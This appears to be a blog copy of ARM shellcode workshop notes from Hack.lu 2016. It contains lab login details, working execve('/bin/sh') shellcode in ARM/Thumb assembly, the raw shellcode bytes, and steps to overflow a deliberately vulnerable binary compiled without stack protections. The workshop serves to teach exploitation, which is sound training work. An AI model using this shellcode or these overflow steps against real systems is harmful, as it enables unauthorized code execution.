ARM SHELLCODE BASICS WORKSHOP

VIEWER (10.50.0.125) Download A+ A- MenloMonacoDroidInputPC-DOSTRS80C64NESDonkey Kong
ARM SHELLCODE BASICS WORKSHOP - HACK.LU 2016 - INSTRUCTIONS
-----------------------------------------------------------
Wireless network: exploitlab3, password: exploitlab
Web server: 10.50.1.41
Slides: http://10.50.1.41/ - click Exploit Skeleton Scripts
download the PDF.

Left side of the workshop Right side of the workshop
------------------------- --------------------------
ssh [email protected] ssh [email protected]
password: exploitlab password: exploitlab

Please make a copy of the "workshop/" directory to another directory of
your choice. We will be sharing this login ID, so please play nice!

mkdir my_unique_directory
cp workshop/* my_unique_directory

ARM ASSEMBLY THEORY
execve SHELLCODE
reverse shell SHELLCODE - exercise

LABELS
------
.section .text
.global _start

_start:
mov r0, #1
ldr r1, mystring_address
mov r2, #12
mov r7, #4
svc #0
bkpt

mystring_address:
.word mystring

.section .data

mystring:
.ascii "Hello World\n\0"


as first.s -o first.o
ld first.o -o first
./first
Hello World
Trace/breakpoint trap

objdump -d first

Disassembly of section .text:

00008074 <_start>:
8074: e3a00001 mov r0, #1
8078: e59f100c ldr r1, [pc, #12] ; 808c
807c: e3a0200c mov r2, #12
8080: e3a07004 mov r7, #4
8084: ef000000 svc 0x00000000
8088: e1200070 bkpt 0x0000

0000808c :
808c: 00010090 .word 0x00010090

$ objdump -d exec_thumb

exec_thumb: file format elf32-littlearm


Disassembly of section .text:

00008054 <_start>:
8054: e28f3001 add r3, pc, #1
8058: e12fff13 bx r3
805c: a002 add r0, pc, #8 ; (adr r0, 8068 <_start+0x14>)
805e: 1a49 subs r1, r1, r1
8060: 1c0a adds r2, r1, #0
8062: 270b movs r7, #11
8064: df01 svc 1
8066: 1c2d adds r5, r5, #0
8068: 6e69622f .word 0x6e69622f
806c: 0068732f .word 0x0068732f

exec_final.s
------------
.section .text
.global _start
_start:
.code 32
add r3, pc, #1
bx r3

.code 16
add r0, pc, #8
sub r1, r1, r1
mov r2, r1
strb r2, [r0, #7] /* write null byte at end of /bin/sh */
mov r7, #11 /* syscall 11, execve */
svc #1

.ascii "/bin/shX"

as exec_final.s -o exec_final.o
ld -N exec_final.o -o exec_final

RAW SHELLCODE
-------------
objcopy -O binary exec_final exec_final.bin
^^^^^^^^^^^^^^
RAW Shellcode, without ELF data
hexdump -C exec_final.bin
Use this as shellcode

So as you can see , check the output
[email protected]:~/blackhatcolombia$ hexdump -C exec_final.bin
00000000 01 30 8f e2 13 ff 2f e1 02 a0 49 1a 0a 1c c2 71 |.0..../...I....q|
00000010 0b 27 01 df 2f 62 69 6e 2f 73 68 58 |.'../bin/shX|
0000001c


So now lets compile the victim file
[email protected]:~/blackhatcolombia$ make victim1
gcc -marm -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack victim1.c -o victim1

Export EGG
[email protected]:~/blackhatcolombia$ export EGG=$(./smash1.pl)


now we have the segmentation fault, brkp

[email protected]:~/blackhatcolombia$ cp smash1.pl smash2.pl
[email protected]:~/blackhatcolombia$ ./hex_encode.pl exec_final.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
[email protected]:~/blackhatcolombia$ vi smash2.pl

add the new shellcode

[email protected]:~/blackhatcolombia$ export EGG2=$(./smash2.pl)

[email protected]:~/blackhatcolombia$ ./victim1 "$EGG2"




CONNECTED 10.50.1.41

0 pensamientos:

Post a Comment

feedback!